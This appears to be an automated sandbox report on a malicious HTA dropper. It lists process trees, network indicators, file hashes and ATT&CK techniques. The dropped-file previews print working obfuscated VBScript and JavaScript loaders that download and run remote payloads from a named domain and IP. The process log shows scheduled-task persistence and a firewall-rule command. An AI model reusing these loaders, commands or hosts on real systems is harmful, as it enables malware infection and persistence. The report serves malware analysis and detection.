    Source: C:\_6720c012c774c\BLOCKBUSTER.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 109.234.39.156 80
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\_6720c012c774c\BLOCKBUSTER.exe "C:\_6720c012c774c\BLOCKBUSTER.exe"
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720c012c774c\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information111
    Scripting
    Valid Accounts1
    Windows Management Instrumentation
    1
    Scheduled Task/Job
    111
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Email Collection
    2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Scheduled Task/Job
    111
    Scripting
    1
    Scheduled Task/Job
    21
    Disable or Modify Tools
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media2
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    DLL Side-Loading
    1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture14
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials14
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    SourceDetectionScannerLabelLink
    C:\_6720c012c774c\BLOCKBUSTER.exe0%ReversingLabs
    C:\_6720c012c774c\unrar.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    apps.downloadaps.com
    172.67.155.19
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://109.234.39.156/mod-pt28/pt2810.ziptrue
        unknown
        http://109.234.39.156/pt/pt28.php?nomepc=user-PCtrue
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          109.234.39.156
          unknownRussian Federation
          48282VDSINA-ASRUtrue
          172.67.155.19
          apps.downloadaps.comUnited States
          13335CLOUDFLARENETUStrue
          IP
          127.0.0.1
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1544420
          Start date and time:2024-10-29 12:00:36 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsinteractivecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:47
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • EGA enabled
          Analysis Mode:stream
          Sample name:#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta
          renamed because original name is a hash value
          Original Sample Name:VER_COMPROVATIVO_.hta
          Detection:MAL
          Classification:mal96.evad.winHTA@51/13@1/30
          Cookbook Comments:
          • Found application associated with file extension: .hta
          • Exclude process from analysis (whitelisted): dllhost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: #U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta
          Process:C:\Windows\SysWOW64\curl.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):2659
          Entropy (8bit):4.998584615752592
          Encrypted:false
          SSDEEP:
          MD5:46F7BCBA3D3BB39018F03BDB1270A1FF
          SHA1:74F4A3A4BBADE44B4862F4D9F3C32C0F2F4AF474
          SHA-256:484FDA6F16CC622220A22A322A8A4D811CB6FABD9F80E0F6ACCA286F9AD6F213
          SHA-512:85B23E2597290EAA737A79BB6AA672F3D473020E1EFFB5629C4430DF52381C7C821C45BBCB160532F5291B4361D6757A411F683E91A6ABA30D40C48B904330F5
          Malicious:true
          Reputation:unknown
          Preview:Option Explicit........Sub DownloadAndExtractZip(url, destinationFolder).. Dim xmlhttp, adodbStream, fso, shellApp, files, file, exeFile.. Set fso = CreateObject("Scripting.FileSystemObject").. If Not fso.FolderExists(destinationFolder) Then.. fso.CreateFolder(destinationFolder).. Else.. WScript.Quit.. End If .... Set xmlhttp = CreateObject("MSXML2.XMLHTTP").. Set adodbStream = CreateObject("ADODB.Stream").. .. Set shellApp = CreateObject("Shell.Application").. .. xmlhttp.Open "GET", url, False.. xmlhttp.Send.... adodbStream.Open.. adodbStream.Type = 1 ' Binary.. adodbStream.Write xmlhttp.ResponseBody.. adodbStream.Position = 0 .. adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2 .. adodbStream.Close.... ExtractZipFile destinationFolder & "\downloaded.zip", destinationFolder.... fso.DeleteFile destinationFolder & "\downloaded.zip".... Set files = fso.GetFolder(destinationFolder).Files.. For Ea
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
          Category:dropped
          Size (bytes):40199937
          Entropy (8bit):7.974970402626158
          Encrypted:false
          SSDEEP:
          MD5:098CC25E10115CF3342D50198CFEBD42
          SHA1:154854D4E1A6F51797CCD90F39DA93A5AC5CFAF4
          SHA-256:0240A99AC3D5B87BBEB9DE0C24F15DB106FF13110B23CB257CCD64BE6B7662FE
          SHA-512:FF606E3A17E3E48AF17222ACC731A4AEAEFE06E031A4DD37C301D39FDC16BC5ACFD5255D7AC2472640FD81ED103F47282CD4125F6FAA6DA7E849C403CF2DE052
          Malicious:false
          Reputation:unknown
          Preview:PK......../|.:...0?}..........unrar.dll..}|T..8..}H..%w....!..D.l.... ...w....6MS..v....7.r3\...}.Z.o..[l5.b.M ...VP......>@x..9g.n6......|>.......3g.9s...3w.Z0..`._$"...../...z.2.....A...+.umY.O..?...?Yt...?....~.K......J..C.....?...~<~..v...z,.......4.....f...c.....g....J..8Lq.f...O.=u...7....{.O.T.p...)...!.W..#...d. A...B=.3.....&....1AKc.&^`...K..9.'..B.].....s.......B.Q../. 4..[.^H.................x....=G..: .t(..E.....;....=W........uH.....w.e...-^.#....,$.}...-...C.avN......x......?Vf7N..O..S.;[.......R..?......y.....G....(....=|\......_U.K......LH.....7..t.{'.....=..\k.W.....3...+.[L.....}.Z.t....mRP/.....?s....AqM.%.@G..C......X...E....l#+49.k.lo.....{j..,KQ.....u.t...$'...........k.A^f.....c....g....Q.|....K.*.. ..........R'*..Q..0.e...+..}.~.^..P.C......7.,.../.n].....pM...$..?be..c........-...........Nu6..*...3.....SA..$)mE%..e.U... .&.....0....)../F".A..g....k.{ii)$...a....Q....t.S....i.p.X= ..:{:...u.=O....P}2.$.
          Process:C:\Windows\SysWOW64\mshta.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):723
          Entropy (8bit):5.434782169433044
          Encrypted:false
          SSDEEP:
          MD5:BA4D98C2C53301B749D15280AEDD7CFE
          SHA1:E66DE10AEFA5C59A36E29FE6271FFDB3620FFD1A
          SHA-256:36FA1ECB99146FB4F9C3B31AFF08974B5EF3367EF367F20EDAA24F8A2E13ECA4
          SHA-512:6477889162AE84C2425BAF1E2F3EECA978D5B04DBF0922A85482B1FC262FE4BA1DF55C201F9EF025FFCC2B54E78A70721BA06A44A93ED0F58B20CE4E276C74E7
          Malicious:true
          Reputation:unknown
          Preview:....function pVvId92(vHkR3pm51) .. pVvId92 = Replace(vHkR3pm51,"|", "")..end function....Dim shell, publicFolder..Set shell = CreateObject("WScript.Shell")..publicFolder = shell.ExpandEnvironmentStrings("%PUBLIC%")......Dim vbsFilePath..vbsFilePath = publicFolder & "\" & "6720c012c78cd.vbs"......CreateObject(pVvId92("W|s|c|r|I|p|t.|s|h|E|l|l")).Run pVvId92("cmd /V/D/c curl -k -o " & vbsFilePath & " https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs"), 2, TRUE......CreateObject(pVvId92("|W|s|c|r|I|p|t.|s|h|E|l|l")).Run pVvId92("cmd /V/D/c start " & vbsFilePath), 2, TRUE....CreateObject(pVvId92("|W|s|c|r|I|p|t|.|s|h|E|l|l")).Run pVvId92("cmd /V/D/c start " & vbsFilePath), 2, TRUE..close..close..close
          Process:C:\Windows\SysWOW64\mshta.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):345
          Entropy (8bit):5.4456791629875365
          Encrypted:false
          SSDEEP:
          MD5:88C55899F793F5031A670D3F65582A67
          SHA1:DAE14EC20C8B3972B611AE918068C7E0DEA28CC1
          SHA-256:B37600330A8D2895343279FEB3B86D82B64126D488916E8AC24E57551DBEAA4F
          SHA-512:AD5A880C667FDABABBB25A5D84D1FA131E824384B2514E2F323134BDF7726E42EE51597DA17CD61B0188FEA3176AE0B600D137DCDEEC04C6D73F404EFE1A3E33
          Malicious:false
          Reputation:unknown
          Preview:moveTo(98559, 91359);..var dqWD0kG9 = document.createElement("script");..var RNGvD95 = ".";..dqWD0kG9.setAttribute("src", "https://apps" + RNGvD95 + "downloadaps" + RNGvD95 + "com/pt/6720c012c774c/6720c012c78c7" + RNGvD95 + "vbs");..dqWD0kG9.setAttribute("type", "text/vbscript");..document.getElementsByTagName('head')[0].appendChild(dqWD0kG9);
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):6144
          Entropy (8bit):4.127573243916201
          Encrypted:false
          SSDEEP:
          MD5:1909C4167A957E31CAAAF79F58BECFCE
          SHA1:2E65A61F06AECCA5F5007EE6B4CBF5DCC1C20C95
          SHA-256:CC4CD563ED732768A979E9391418A53ED3EC5F4DF05CB5C25870AF68CD3D7DCA
          SHA-512:2E386F638A50CB9FE7A0A37251A668EE07FC4B5009BDCAC0CBED1D55C25CACBB9C8677DEACDC815DCB63D97AAF76F3503573004CB65966C1B0444507922329AE
          Malicious:false
          Reputation:unknown
          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):77475840
          Entropy (8bit):5.720370255958521
          Encrypted:false
          SSDEEP:
          MD5:5B57051D91874CB6D772A86B2C78D0FB
          SHA1:46227F3A57D37D09CC6509078BF3964CFA4BD119
          SHA-256:CBDA657F5C2611674204E0E2AC5E68BCA7B717B2EAEA4A787AE802F02900B220
          SHA-512:76FE3FA6316BA5734B3AAC52B4FA26E6BFF3D02EAA2B819ACB4DE68CEDD8AF2EC526C95FAC25EA9694DCA4F4C64D0FF45705145CA381B7550097119D039A4D44
          Malicious:false
          Reputation:unknown
          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......g...........!..............................@..........................P............@..............................................F.......................I...........................................................p.......................text............................. ..`.itext............................ ..`.data...|].......^..................@....bss.....................................idata.............................@....didata......p......................@....edata..............................@..@.rdata..E...........................@..@.reloc...I.......J..................@..B.rsrc....F.......F..................@..@.............P.......0..............@..@........................................................
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:data
          Category:dropped
          Size (bytes):425472
          Entropy (8bit):7.447705234612919
          Encrypted:false
          SSDEEP:
          MD5:DAC35720BE4D4105234C4C99208C43D9
          SHA1:CA13AEC5182035AC053004D51DDF4EC9A018B494
          SHA-256:DADF7277164AC0D065FEAD44B1ED3E3FD9BCCCA39315AB35DEF952036A0B0B80
          SHA-512:E4FFF267040503457DE828FAFAF73C7A1C095FF87E85BD6CC9D1991193A8A1E51FAEF1DDF9EA5400849A6AABA9793DD9FFA68E032A293ACD134F3274D05AA525
          Malicious:false
          Reputation:unknown
          Preview:.10.L&.M.......G.................a0.L&.I.......................=.a>../^h..9.mn.................U.>S.i.......................a0.L&.I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.I........................a0.M!.P.............q^..........`0.L&...........................a0.L&.M........?................a0.L&.I........................sd0.m&.I........................3d0(*&.I.........................a0.L&.I.........................a0.L&.I.........................d0.\&.I........................5q.L&......z....................a0.L&S........v...._.......m....a0.L&.I......>.......i....O....a0..#.I..............?.........a0..#.I....N.....................\./&..............I............a0.L&.g........................a0.L&.I...................?....a0.2 .I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
          Category:dropped
          Size (bytes):9571304
          Entropy (8bit):6.8003113138269855
          Encrypted:false
          SSDEEP:
          MD5:74D3F521A38B23CD25ED61E4F8D99F16
          SHA1:C4CD0E519AECA41E94665F2C5EA60A322DEB3680
          SHA-256:1D822B3FAABB8F65FC30076D32A95757A2C369CCB64AE54572E9F562280AE845
          SHA-512:EC1C8B0EB895FD8947CAD6126ABC5BCA3A712E42475228B9DCB3496098E720ABB83D4CBA4621EDBD8D3AD7F306A5F57CED9C2C98FE2C2D0C8EBBBF99D7FAF0F1
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Reputation:unknown
          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....Z.O..................k...&......)k......0k...@..........................`...................@....................r.O.....r.._....s..F .........`........................................s.......................r.|............................text.....j.......j................. ..`.itext..|{....j..|....j............. ..`.data....&...0k..(....k.............@....bss.........`q......Fq..................idata..._....r..`...Fq.............@....edata..O.....r.......q.............@..@.tls..........r.......q..................rdata........s.......q.............@..@.rsrc....F ...s..H ...q.............@..@....................................@..@................................................................................................
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:data
          Category:dropped
          Size (bytes):1561600
          Entropy (8bit):7.330570271317417
          Encrypted:false
          SSDEEP:
          MD5:9E5AA15A31EB279CC89AA4AAB29E5611
          SHA1:8534D576FA9E9B1B5D4CFE697B71D0A87A379381
          SHA-256:D76C62368C4460BA683893ADEA061652900BA9CC923FE30585B8A169F58BAA8A
          SHA-512:2C0FDD5170BA82A47884CEEFA0C83D9CD9D740EB7FB18A7EC3BAEC76C8C6F890E2397DFF65BAF6197E1690E2E8765BB081C6A1D91BCC7F4EA2A34616832A9EA6
          Malicious:false
          Reputation:unknown
          Preview:....V*..........G...............N.S.T*............................S.K..G.Z.1.oo..............:.1.tX`......................N.S.T*..........................N.S.T*..........................N.S.T*..........................N.S.T*............................S..+...............q^.....!..NUV.T*..........................J.S.T*..........................N.S.T*..........................N.A.............................NWA.............................N.S.T*..........................N.S.T*...........................zB.T:...<..........................T*...f.......y..............N.S..*.J........................N.S.T*.........?.......Y....O..N.S.TB.................?.........S.T........n..................`.6.;I...............m..........N.S..*........................N.S.T*..........................N.S.T...........................N.S.T*..........................N.S.T*..........................N.S.T*..........................N.S.T*..........................N.S.T*..........................N.S.T*..
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):178176
          Entropy (8bit):6.475102022731023
          Encrypted:false
          SSDEEP:
          MD5:4289541BE75E95BCFFF04857F7144D87
          SHA1:5EC8085E30D75EC18B8B1E193B3D5AA1648B0D2E
          SHA-256:2631FCDF920610557736549E27939B9C760743A2CDDEC0B2C2254CFA40003FB0
          SHA-512:3137A7790DE74A6413ACA6C80FD57288BCC30A7DF3A416F3C6E8666041CD47A9609136C91405EEE23224C4AE67C9AEBBBA4DD9C4E5786B09B83318755B4A55FD
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Reputation:unknown
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............C..C..C...C..C...C..C...C...C...C..C.R.C..C..C]..C...C...C...C..C...C..C...C..CRich..C................PE..L.....;J...........!.....4...................P...............................`.......x....@.............................p.......P.... ..4....................0......0R..............................po..@............P...............................text....3.......4.................. ..`.rdata..p;...P...<...8..............@..@.data...|............t..............@....rsrc...4.... ......................@..@.reloc...$...0...&..................@..B................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\netsh.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):7
          Entropy (8bit):2.2359263506290326
          Encrypted:false
          SSDEEP:
          MD5:F1CA165C0DA831C9A17D08C4DECBD114
          SHA1:D750F8260312A40968458169B496C40DACC751CA
          SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
          SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
          Malicious:false
          Reputation:unknown
          Preview:Ok.....
          File type:HTML document, ASCII text, with CRLF line terminators
          Entropy (8bit):4.781957554958
          TrID:
          • HyperText Markup Language (12001/1) 66.65%
          • HyperText Markup Language (6006/1) 33.35%
          File name:#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta
          File size:140 bytes
          MD5:57368b1f9ef19b72f8d342affe2efd77
          SHA1:6bd0579bb92f64902f587f53670e2b263e611a9b
          SHA256:390bb4f14a9be0faa0f5d0b4dc6fdfcca578b746a119e98d745650cff14976d9
          SHA512:13618d90740a2e12d3f4205a467b35c1fbaaa597d0629f1d0ce2eaf4818e5bc15d734b3ee6f4516853c356d665937f2aee660aee5f2a45b0e66bab9c69f09614
          SSDEEP:3:qVoB3tObvXAK4JKZVqIOR1XFdIcG+XFSILGXIMBWhtoAcMBcacWWGb:q43tEvXAz5tGgLVMch0MWXfGb
          TLSH:79C02B7B1F00DC1D4030697C0498F1D7001BB0001690CF06C4E840233D012954D83D42
          File Content Preview:<html>..<head>..<script src="https://apps.downloadaps.com/pt/6720c012c774c/js/6720c012c76dc.js"></script>..</head>..<body>..</body>..</html>
          Icon Hash:8d8db280a28080a0